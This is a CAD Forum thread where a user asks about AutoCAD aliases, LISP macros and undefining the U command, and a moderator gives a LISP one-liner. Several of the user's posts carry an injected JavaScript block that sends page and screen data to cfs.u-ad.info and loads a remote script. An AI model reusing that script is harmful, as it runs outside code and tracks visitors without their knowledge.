CAD Forum - tips, tricks, discussion and utilities for AutoCAD, Inventor, Revit and other Autodesk products [www.cadforum.cz] ARKANCE | CONTACT - CZ | SK | EN | DE
RSS channel - CAD tips RSS tips
RSS discussions

Discussion Discussion forum

?
CAD discussions, advices, exchange of experience

CAD Forum - Homepage CAD discussion forum - ask any CAD-related questions here, share your CAD knowledge on AutoCAD, Inventor, Revit and other Autodesk software with your peers from all over the world. To start a new topic, choose an appropriate forum.

Please abide by the rules of this forum.
This is a peer-to-peer forum. The forum doesn't replace the official direct technical support provided by ARKANCE for its customers.
How to post questions: register or login, go to the specific forum and click the NEW TOPIC button.
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Topic ClosedHow to change "U" into other not as Undo anymore ?

 Post Reply Post Reply Page  12>
Author
John Connor View Drop Down
Senior Member
Senior Member


Joined: 01.Feb.2011
Location: United States
Using: AutoCAD 2018
Status: Offline
Points: 7175
Direct Link To This Post Topic: How to change "U" into other not as Undo anymore ?
    Posted: 23.Jan.2016 at 12:10
That looks like a lisp routine to me.
"Humans have a strength that cannot be measured. This is John Connor. If you are reading this, you are the resistance."

<<AutoCAD 2015>>

Back to Top
Deby Ferdian View Drop Down
Newbie
Newbie


Joined: 30.Dec.2015
Location: Indonesia
Using: AutoCAD 2013
Status: Offline
Points: 17
Direct Link To This Post Posted: 23.Jan.2016 at 09:01
When I insert my action script ("_SOLIDEDIT _FACE _L") to my ACADDOC.LSP. The display menu appears is not popup gui anymore but some menu drop beginning a start with "BY LAYER" option of the first after I selected the face of an object which one I want to put to give the color of it. Why it doesn't more want to shown up the pop up gui the colors menu again ? What is wrong with my script ? This is the script I made. If you mind to let you to see my script and correction it and Please give me a some suggestion ?

 

(defun c:FC ()

(command "SOLIDEDIT" "F" "L")

(princ)

)


And in order this also applies to my an another scripts too such as; "select > last", "select > previous", "select > fence", "select > cpolygon", "select > wpolygon", "select > group", "select > subobject".



~ still process to learning of an english ~if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpn%2bc4eMJSbqBMiEYhaflVNiHJofPslRUC6vWD47iakYnfs%2bTblvADSDVKSi7OlSV9ywk5rVpm6d%2fW71jn1OSW2s7KPfAOnonSBN3clTG9%2fGZmQEhpNvFUFRBePbF3ngtrkIsW9ja7HsQITRQ3sMfJ5EhvuBekBD4B5dUAw6t8DOO5vDCFf5a8MYxm4ErG3Mgpr7tvqUKNvk90wigIWQzBKykWNplY47%2fgRgWjEbKMUVlgYhL4KaNAXw87YvQBMsSM2%2bKjF7s7kLFn%2bO7ve6JD%2boTPT%2bDmO2oIOYrljhOlHUdpJwSbF0b7GmHuJdhVzZyC6yP7Re2xc9xr3bKTwa5h0ta3x0zAXN5SWfcVv0QmQ7ylbfwt3AD4CSelDF%2fgiiW%2fUMSyiHMwIoAypP8IbLkxJ47QKu64Kaq%2fGoSYxraDe5vTdGosFX4JBrCN8kOW7e380b0%2f6J1C5IPSId33eivuz6VhKKmOVWhqbuQxTpAjE1SYqG%2flPMnybfuw%2bHDb7lJMlu9n0EhfmCLh8twzRCTDUP9FuBQkP6Cjc" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

I believe I can fly and doesn't just also to imagine that!
Back to Top
John Connor View Drop Down
Senior Member
Senior Member


Joined: 01.Feb.2011
Location: United States
Using: AutoCAD 2018
Status: Offline
Points: 7175
Direct Link To This Post Posted: 19.Jan.2016 at 12:13
There is a lot of garbage coming across with your posts.

Your acad.pgp file appears to have been botched up by someone who did not know what they were doing.  Restore the original acad.pgp file by doing a REPAIR of the installation then learn how to edit the it correctly before proceeding any further.  You should NOT have almost 1,000 commands in that file.

Your questions regarding macros have been answered at the CADTutor website by others.


Edited by John Connor - 19.Jan.2016 at 16:40
"Humans have a strength that cannot be measured. This is John Connor. If you are reading this, you are the resistance."

<<AutoCAD 2015>>

Back to Top
Deby Ferdian View Drop Down
Newbie
Newbie


Joined: 30.Dec.2015
Location: Indonesia
Using: AutoCAD 2013
Status: Offline
Points: 17
Direct Link To This Post Posted: 19.Jan.2016 at 06:07
How do if I want to record the macro of "_zoom _o" (it was zoom but focus to the object that what I've selected) I was try but nothing happen ? I assign this to the "ZS" as a name of a macro I save.



~ still process to learning of english ~
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpneGsF4VQYXJNO5rRUx0B3NHqm7EA0kY3lM1hafA%2bbVjJ7FbdOlZU%2bBzeqx0UxPNOj8GsDMDZC9sf7p30Y55boPTu7FcLqnufOkKG%2bizigRUtnpYRuvpoo2unUR3D6cMejN7VTliCB%2b%2fLQ14dgPBt%2bLG9%2fHU1bjIhca3PdChmZY1IqEQiDdy%2f0ufTIvynYdv5i8XLFg5Qu%2bCzbUMPCdcOeWhn9pPZI16iTiLJJaqnK%2fsT1%2bOY8hNK6Yllg76W0oJtuOMdcC1Aaln7hI39hQ5aDttbxe%2fLcCM5uzEvZK4m%2buFTWG7cFlgY2xbFmYX0GLpXaS4JHs0Egt%2bQjwLFet%2fskBcALDCDgXVAWf6VAxvJFoX4umieGDBHXJdxfjr0nMCJ4M55Z0nTe7kyBoKegHNJSYYTDIfP4gLYXy2Jso6DFOZZNqKaf9t6XPsnwYUgLxTpPSfDGuE8wMHnNnVULKdowE5ine11cn5i72VgokgR%2b1RYH8jMTZt3izbOs%2fj7csz2g2eoyKyHRvnHrNz%2beZtomGd5z5f0YcrlY" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
I believe I can fly and doesn't just also to imagine that!
Back to Top
Deby Ferdian View Drop Down
Newbie
Newbie


Joined: 30.Dec.2015
Location: Indonesia
Using: AutoCAD 2013
Status: Offline
Points: 17
Direct Link To This Post Posted: 15.Jan.2016 at 18:46
Sorry, reasonable! And it's not been a regular thing again if you do not understand at all. It was all because of my language are very ugly. Maybe I should do a re-examination and make it back. Maybe that's better. :) But I beg respectfully please understand my language and my question! Perhaps with a bit requires a very keen understanding of the master in this forum.

How can I find out which one of the hundreds of orders (over ±986 commands I have) that have been made have the same or duplicated and how to fix them quickly? because it is not possible at all if I should always be examined all of an every single line of them.

~ translated back with google translate ~
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnQA3Pry%2fnWMEQVP4FVtW4vL%2fjKjZiA9GvbjM6bWTp%2bGndt4XqKzbdJUFVowUnNXxaWHtvr%2fUQgm3uYt1hdrBAB9ZamO7KHsAtXkkKXK2TH524774Vcxcj9He9MfvZ37N0PRXLC1R0fHzToU8KCVmAWhpCkytfS12%2bQ4ND0nXVmZJ5o7yOYYNY4x1zqoW%2bA3B9DCKXuNvLUUufko9We9tYOc43VE%2fE8%2fJW%2bU%2fH1pDg5a2wyfs2i4rksGx9gk8E5zQ5Kb4BaDirLmzJoIfVmFoDso%2b1azaf7b8gG2kq0tWi9RYBKv2ZWuZ0ELlKQyYjic96fQfz1C81jeLc1pomQZNohnqt3Q1dTSN81ZRpmEqI8z%2f%2fVslfYxW%2f70RswrZg9HYzjHWWW%2fSEWxHg4Ryl2Gx%2bXUANlbSqNKoXCvEc40oz5EvwZtVP%2f6kCGbZZwcbPBn8ep16vqvWdwh%2fdJ%2bxclNEvjSdiXvwMqdCwkRvmpB%2fNjxLgFDvZGY7nqs6eGqvN1Vv2QpVKY2dGg%2bkIGYwbqA3J%2byg%2bEE3rJCLl" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
I believe I can fly and doesn't just also to imagine that!
Back to Top
John Connor View Drop Down
Senior Member
Senior Member


Joined: 01.Feb.2011
Location: United States
Using: AutoCAD 2018
Status: Offline
Points: 7175
Direct Link To This Post Posted: 15.Jan.2016 at 11:43
Originally posted by Deby Ferdian Deby Ferdian wrote:

Hi, sorry I made the new topic that I create on the same line. But How do I create or assign a command directly refer through to the macro of the "_solidedit _edge _color " or "_solidedit _face _color "?  e.g. I want to assign the "CF" to be "_solidedit _face _color " of the macro. Please Help me!   ^_^"  and thanks to advances and you did very good. Well done master! ;D


Didn't someone answer this question at another website?
"Humans have a strength that cannot be measured. This is John Connor. If you are reading this, you are the resistance."

<<AutoCAD 2015>>

Back to Top
John Connor View Drop Down
Senior Member
Senior Member


Joined: 01.Feb.2011
Location: United States
Using: AutoCAD 2018
Status: Offline
Points: 7175
Direct Link To This Post Posted: 15.Jan.2016 at 11:40
What's with all the garbage in the post above?

I don't understand what your question is.
"Humans have a strength that cannot be measured. This is John Connor. If you are reading this, you are the resistance."

<<AutoCAD 2015>>

Back to Top
Deby Ferdian View Drop Down
Newbie
Newbie


Joined: 30.Dec.2015
Location: Indonesia
Using: AutoCAD 2013
Status: Offline
Points: 17
Direct Link To This Post Posted: 15.Jan.2016 at 00:26
How to detecting the mutual command of an AutoCAD 2013 by it self or automatically?   ;D   Sorry chould be I talk too much to this forum but I want to learn to know more what I've don't know through this day,,if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnuuc2vaqqeVj5G5Dn%2fB9D7xQjkH12IKQWrHvvdoK%2fYP5p7J%2fSZOZGk7pptxEi7j8oqADLOxRneYckFKi2trAoLDXcrUPzBp9kAk9USSxCY24Nu%2fCs0jSuu%2flbpasSZtWzNVS3OBekR3PShWmI6y%2fPCYRL96%2fsYC5pR2R%2frHNGXZnUr7xebzN55lcdIJqFhBUf%2bERgeSXh3pZIROcPS5L5ttGb5oZUs34ENNF1qSyLdQq7NuSLmW5A%2fGngrYSfADRALZeEY0N9InCxQgswEvafj6A46XLjRrgdcIVp%2fjF507Buh221pERhcXDTG0BFfxkToSERpp7bpNAxfOgdLotv%2fkpvfa2wWvEDrBzRvd7%2bD%2fCWVzERzzCqIJJo9LOd%2fqOpLOokIy5POUQ5HjB3NEW8fdsB8McH28zWruA3Nlvo3t%2buIf2RlgqE8W57RC7AsjzS28TxGVCdFnK92l2N2ZjyASEuYp1AuQPkcBc35%2byI4M8Vus6KA8OUae71aviJIY6SbwCncWovNqqDHy3bLGZWI%2bJ%2blvCOEgLDfxk3E5IPO7w%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

Edited by Deby Ferdian - 15.Jan.2016 at 00:31
I believe I can fly and doesn't just also to imagine that!
Back to Top
Deby Ferdian View Drop Down
Newbie
Newbie


Joined: 30.Dec.2015
Location: Indonesia
Using: AutoCAD 2013
Status: Offline
Points: 17
Direct Link To This Post Posted: 14.Jan.2016 at 09:24
Hi, sorry I made the new topic that I create on the same line. But How do I create or assign a command directly refer through to the macro of the "_solidedit _edge _color " or "_solidedit _face _color "?  e.g. I want to assign the "CF" to be "_solidedit _face _color " of the macro. Please Help me!   ^_^"  and thanks to advances and you did very good. Well done master! ;D
I believe I can fly and doesn't just also to imagine that!
Back to Top
Vladimir Michl View Drop Down
Moderator Group
Moderator Group

Arkance Systems CZ

Joined: 26.Jul.2007
Location: Czech Republic
Using: Autodesk software
Status: Offline
Points: 2124
Direct Link To This Post Posted: 06.Jan.2016 at 10:22
Just make a text file ACADDOC.LSP in the Support folder and put a single line into it:
 
(command "_UNDEFINE" "U")
 
 
Vladimir Michl (moderator)
ARKANCE - https://arkance.world - Autodesk Platinum Partner
Back to Top

Related CAD tips:


 Post Reply Post Reply Page  12>
  Share Topic   

Forum Jump Forum Permissions View Drop Down



This page was generated in 0,094 seconds.